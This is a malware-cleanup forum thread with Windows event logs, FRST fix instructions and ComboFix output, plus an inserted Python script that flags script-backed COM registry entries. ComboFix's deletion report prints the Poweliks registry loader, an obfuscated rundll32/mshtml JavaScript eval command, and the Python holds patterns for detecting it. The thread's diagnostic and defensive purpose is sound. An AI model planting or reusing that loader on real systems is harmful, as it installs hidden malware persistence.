The Volume Shadow Copy service cannot start while in safe mode. [0x8007043c, This service cannot be started in Safe Mode
]
 
 
Operation:
   Instantiating VSS server
 
Error: (10/27/2014 09:32:18 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
 
Error: (10/23/2014 10:16:54 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
 
Error: (10/22/2014 03:57:09 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.17344 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 1d74
 
Start Time: 01cfee3250df245f
 
Termination Time: 41
 
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
 
Report Id:
 
 
System errors:
=============
Error: (10/28/2014 10:01:55 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (10/28/2014 10:01:25 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (10/28/2014 09:57:10 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:54:23 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:50:09 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:43:17 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}
 
Error: (10/28/2014 09:41:53 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {B7A9F07F-7443-4925-BCF9-BAACAD2A0A06}
 
Error: (10/28/2014 09:23:13 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:16:09 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/28/2014 09:10:16 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
 
Microsoft Office Sessions:
=========================
Error: (09/17/2013 00:57:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 1955 seconds with 600 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:26:34 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:26:24 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:26:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:26:04 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:42 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 8 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 7 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 9 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (05/29/2013 02:25:03 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 25 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
==================== Memory info =========================== 
 
Processor: Pentium® Dual-Core CPU E6600 @ 3.06GHz
Percentage of memory in use: 40%
Total physical RAM: 1993.25 MB
Available physical RAM: 1183 MB
Total Pagefile: 3986.49 MB
Available Pagefile: 3138.99 MB
Total Virtual: 2047.88 MB
Available Virtual: 1899.98 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:139.55 GB) (Free:101.02 GB) NTFS
Drive d: (HP_RECOVERY) (Fixed) (Total:7.49 GB) (Free:0.86 GB) NTFS ==>[System with boot components (obtained from reading drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 149.1 GB) (Disk ID: 3B723303)
Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=139.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=7.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
 


#4 deeprybka

  • Malware Response Team

Posted 29 October 2014 - 03:00 PM

Hi,

the next steps are:

Step 1

Press the Windows key + R on your keyboard at the same time. Type notepad and click OK.
  • Copy the entire content of the codebox below and paste into the notepad document:
    CloseProcesses:
    HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    FF Plugin: @microsoft.com/GENUINE -> disabled No File
    cmd: type "C:\ComboFix.txt"
    2014-10-22 12:44 - 2014-10-22 17:04 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
    2014-10-22 12:44 - 2014-10-22 12:44 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
    
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please post it to your reply.

After the Reboot:


Step 2

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste the log in your next reply.

Step 3

Please download TDSSKiller and save it to your Desktop.
  • Start tdsskiller.exe with administrator privileges.
  • Accept the EULA and the KSN Statement.
  • Click on Change parameters.
  • Make sure that all available options (except "Loaded modules") are checked and click OK.
  • Click on Start scan.
  • If any threats are found don't delete them but choose the Skip option for all of them.
  • Click on Report to open the log file. (It is also saved at C:\TDSSKiller.<version_date_time>_log.txt).
    Copy and paste its contents in your next reply.

regards,
deeprybka
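The entry FRST marked "<==== Poweliks?" and the DCOM 10010 error for the same CLSID in the log above can be found mechanically. The following is an added example, not part of the original posts and not FRST's own logic: it parses the CustomCLSID lines, flags COM server values that hold a script command instead of a file path, and checks whether the same CLSID shows up in a DCOM 10010 event. The function names, the indicator list and the placeholder SID are assumptions made for this example.

```python
import re

# Lines in the layout of the FRST Addition.txt excerpts above. The SID is a
# constructed placeholder; the CLSIDs and the truncated value are as logged.
SAMPLE_LOG = r'''
==================== Custom CLSID (selected items): ==========================

CustomCLSID: HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll (Dropbox, Inc.)

System errors:
=============
Error: (10/28/2014 10:01:55 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/28/2014 09:43:17 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}
'''

# "CustomCLSID: <hive>\CLSID\{guid}\<server key> -> <registered command or file>"
CLSID_LINE = re.compile(
    r'^CustomCLSID: (?P<hive>.+?)\\CLSID\\(?P<clsid>\{[0-9A-Fa-f-]{36}\})'
    r'\\(?P<server>\w+) -> (?P<target>.+)$',
    re.MULTILINE)

# DCOM event 10010 is logged when a COM server does not register within the
# timeout; FRST prints only the CLSID as the event description.
DCOM_10010 = re.compile(
    r'^Error: \([^)]*\) \(Source: DCOM\) \(EventID: 10010\) \(User: [^)]*\)[ \t]*\n'
    r'Description: (?P<clsid>\{[0-9A-Fa-f-]{36}\})',
    re.MULTILINE)

# A normal COM server value names a file on disk. These patterns (an assumed,
# deliberately small list) match a value that runs script from the command line.
INDICATORS = [
    (re.compile(r'\b(?:java|vb)script:', re.I),
     'script protocol handler in COM server command'),
    (re.compile(r'mshtml\s*,\s*RunHTMLApplication', re.I),
     'rundll32 calling mshtml RunHTMLApplication'),
]


def parse_custom_clsid(log):
    """Return one dict per CustomCLSID line, with the CLSID upper-cased."""
    return [{'hive': m['hive'],
             'clsid': m['clsid'].upper(),
             'server': m['server'],
             'target': m['target']}
            for m in CLSID_LINE.finditer(log)]


def dcom_10010_clsids(log):
    """Return the set of CLSIDs named in DCOM 10010 events (upper-cased,
    because the registry line and the event differ in case: 4bb6 vs 4BB6)."""
    return {m['clsid'].upper() for m in DCOM_10010.finditer(log)}


def triage(log):
    """Flag script-backed COM servers and note matching DCOM 10010 errors."""
    failed = dcom_10010_clsids(log)
    findings = []
    for entry in parse_custom_clsid(log):
        reasons = [text for rx, text in INDICATORS if rx.search(entry['target'])]
        if not reasons:
            continue
        findings.append({
            'clsid': entry['clsid'],
            'server': entry['server'],
            # Per-user Classes entries take precedence over the machine-wide
            # registration when COM resolves the CLSID for that user.
            'per_user': entry['hive'].upper().startswith('HKU\\'),
            'reasons': reasons,
            # A script command never registers as a COM server, so a 10010
            # error for the same CLSID is consistent with the hijacked value.
            'dcom_10010': entry['clsid'] in failed,
        })
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f['clsid'], f['server'], f['reasons'],
              'per-user' if f['per_user'] else 'machine',
              'DCOM 10010 seen' if f['dcom_10010'] else 'no DCOM 10010')
```

Running the same check on the FRST.txt/Addition.txt produced after the fix should return no findings if the key stays deleted.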

#5 ScotDesort

  • Topic Starter

Posted 30 October 2014 - 08:26 AM

FIXLOG.TXT:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 30-10-2014
Ran by KELI at 2014-10-30 09:15:55 Run:1
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
CloseProcesses:
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
FF Plugin: @microsoft.com/GENUINE -> disabled No File
cmd: type "C:\ComboFix.txt"
2014-10-22 12:44 - 2014-10-22 17:04 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-10-22 12:44 - 2014-10-22 12:44 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
*****************
 
Processes closed successfully.
"HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key deleted successfully.
"HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
 
=========  type "C:\ComboFix.txt" =========
 
ComboFix 14-10-27.01 - KELI 10/28/2014   9:50.4.2 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.1993.1012 [GMT -4:00]
Running from: c:\users\KELI\Desktop\ComboFix.exe
AV: McAfee Total Protection for Small Business *Disabled/Outdated* {86355677-4064-3EA7-ABB3-1B136EB04637}
SP: McAfee Total Protection for Small Business *Disabled/Outdated* {3D54B793-665E-3129-9103-206115370C8A}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded script payload removed]
.
(((((((((((((((((((((((((   Files Created from 2014-09-28 to 2014-10-28  )))))))))))))))))))))))))))))))
.
.
2014-10-28 13:57 . 2014-10-28 13:57 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-10-28 13:57 . 2014-10-28 13:57 -------- d-----w- c:\users\Administrator\AppData\Local\temp
2014-10-27 21:43 . 2014-10-27 21:43 62576 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{03F84622-DC44-49F0-B10F-83765017C362}\offreg.dll
2014-10-27 21:24 . 2014-10-27 21:24 -------- d-----w- c:\programdata\Sophos
2014-10-27 21:24 . 2014-10-27 21:24 73728 ----a-r- c:\users\KELI\AppData\Roaming\Microsoft\Installer\{B829E117-D072-41EA-9606-9826A38D34C1}\SVRTgui.exe1_810EDD9E2F0A4E2BACF86673C38D9F48.exe
2014-10-27 21:24 . 2014-10-27 21:24 73728 ----a-r- c:\users\KELI\AppData\Roaming\Microsoft\Installer\{B829E117-D072-41EA-9606-9826A38D34C1}\SVRTgui.exe_810EDD9E2F0A4E2BACF86673C38D9F48.exe
2014-10-27 21:24 . 2014-10-27 21:24 73728 ----a-r- c:\users\KELI\AppData\Roaming\Microsoft\Installer\{B829E117-D072-41EA-9606-9826A38D34C1}\ARPPRODUCTICON.exe
2014-10-27 21:24 . 2014-10-27 21:24 -------- d-----w- c:\program files\Sophos
2014-10-27 21:21 . 2014-10-27 21:21 20 ----a-w- c:\windows\system32\drivers\SMR430.dat
2014-10-27 20:54 . 2014-10-27 21:21 104120 ----a-w- c:\windows\system32\drivers\SMR430.SYS
2014-10-27 20:54 . 2014-10-27 21:21 -------- d-----w- c:\users\KELI\AppData\Local\NPE
2014-10-27 20:54 . 2014-10-27 20:54 -------- d-----w- c:\programdata\Norton
2014-10-27 20:11 . 2014-10-27 20:13 -------- d-----w- C:\FRST
2014-10-27 19:28 . 2014-10-27 20:41 114904 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-27 19:28 . 2014-10-27 19:29 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-10-27 19:28 . 2014-10-27 19:28 -------- d-----w- c:\programdata\Malwarebytes
2014-10-27 19:28 . 2014-10-01 15:11 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-27 19:28 . 2014-10-01 15:11 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-27 19:28 . 2014-10-01 15:11 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-10-27 19:28 . 2014-10-27 19:28 -------- d-----w- c:\users\KELI\AppData\Local\Programs
2014-10-27 18:26 . 2014-10-14 20:13 8901368 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{03F84622-DC44-49F0-B10F-83765017C362}\mpengine.dll
2014-10-22 16:44 . 2014-10-22 21:04 -------- d--h--w- c:\programdata\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-10-15 17:56 . 2014-07-17 01:39 3221504 ----a-w- c:\windows\system32\mstscax.dll
2014-10-01 13:16 . 2014-09-25 01:40 519680 ----a-w- c:\windows\system32\qdvd.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-10-20 14:29 . 2014-07-09 13:30 163504 ----a-w- c:\programdata\Microsoft\Windows\Sqm\Manifest\Sqm10145.bin
2014-10-02 19:53 . 2011-03-21 15:46 231568 ------w- c:\windows\system32\MpSigStub.exe
2014-09-24 15:16 . 2012-04-03 13:22 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-24 15:16 . 2011-06-10 12:53 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-09 21:47 . 2014-09-24 13:28 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-29 17:00 . 2009-08-18 18:30 564632 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\wlidui.dll
2014-08-29 17:00 . 2009-08-18 18:24 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-23 01:46 . 2014-08-28 13:20 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-01 11:35 . 2014-09-10 13:26 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2011-03-21 39408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2009-07-03 7596576]
"picon"="c:\program files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe" [2009-07-24 796696]
"PDF Complete"="c:\program files\PDF Complete\pdfsty.exe" [2009-06-18 563736]
"Microsoft Default Manager"="c:\program files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" [2010-05-10 439568]
"MVS Splash"="c:\program files\McAfee\Managed VirusScan\Agent\Splash.exe" [2009-11-17 562496]
"McAfee Managed Services Tray"="c:\program files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe" [2009-11-17 95552]
"SiteAdvisor"="c:\program files\SiteAdvisor\6173\SiteAdv.exe" [2007-08-28 36640]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-08-26 136216]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-08-26 171032]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-08-26 170520]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"NCPluginUpdater"="c:\program files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" [2014-10-22 21720]
.
c:\users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-9-12 36414624]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Scanner File Utility.lnk - c:\program files\Kyocera\FileUtility\NsCatCom.exe [2011-3-24 335872]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001
.
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-09-19 108032]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2014-10-27 114904]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-01-07 1343400]
R3 WSDScan;WSD Scan Support via UMB;c:\windows\system32\drivers\WSDScan.sys [2009-07-14 20480]
R4 myAgtSvc;McAfee Virus and Spyware Protection Service;c:\program files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [2009-11-17 221024]
S1 SMR430;Symantec SMR Utility Service 4.3.0;c:\windows\System32\drivers\SMR430.SYS [2014-10-27 104120]
S2 HP Support Assistant Service;HP Support Assistant Service;c:\program files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [2013-11-04 92160]
S2 pdfcDispatcher;PDF Document Manager;c:\program files\PDF Complete\pdfsvc.exe [2009-06-18 635416]
S2 regi;regi;c:\windows\system32\drivers\regi.sys [2007-04-18 11032]
S2 UNS;Intel® Management and Security Application User Notification Service;c:\program files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2009-07-24 2066968]
S3 e1kexpress;Intel® PRO/1000 PCI Express Network Connection Driver K;c:\windows\system32\DRIVERS\e1k6232.sys [2009-09-02 202408]
S3 netr28;Ralink 802.11n Wireless Driver for Windows Vista;c:\windows\system32\DRIVERS\netr28.sys [2009-07-13 530944]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - 65130187
*Deregistered* - 65130187
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-10-28 13:30 1089352 ----a-w- c:\program files\Google\Chrome\Application\38.0.2125.111\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-10-28 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-03 15:16]
.
2014-10-28 c:\windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
- c:\users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe [2014-10-27 16:11]
.
2014-10-28 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-03-21 13:24]
.
2014-10-28 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-03-21 13:24]
.
2014-10-27 c:\windows\Tasks\HPCeeScheduleForKELI.job
- c:\program files\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15 09:43]
.
.
------- Supplementary Scan -------
.
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~1\Office12\EXCEL.EXE/3000
Trusted Zone: //about.htm/
Trusted Zone: //Exclude.htm/
Trusted Zone: //LanguageSelection.htm/
Trusted Zone: //Message.htm/
Trusted Zone: //MyAgttryCmd.htm/
Trusted Zone: //MyAgttryNag.htm/
Trusted Zone: //MyNotification.htm/
Trusted Zone: //NOCLessUpdate.htm/
Trusted Zone: //quarantine.htm/
Trusted Zone: //ScanNow.htm/
Trusted Zone: //strings.vbs/
Trusted Zone: //Template.htm/
Trusted Zone: //Update.htm/
Trusted Zone: //VirFound.htm/
Trusted Zone: mcafee.com\*
Trusted Zone: mcafeeasap.com\betavscan
Trusted Zone: mcafeeasap.com\vs
Trusted Zone: mcafeeasap.com\www
TCP: Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: NameServer = 167.206.245.130,167.206.245.129
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pdfcDispatcher]
"ImagePath"="c:\program files\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3621039740-3434257137-3815352865-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (Read) (RestrictedCode)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"
.
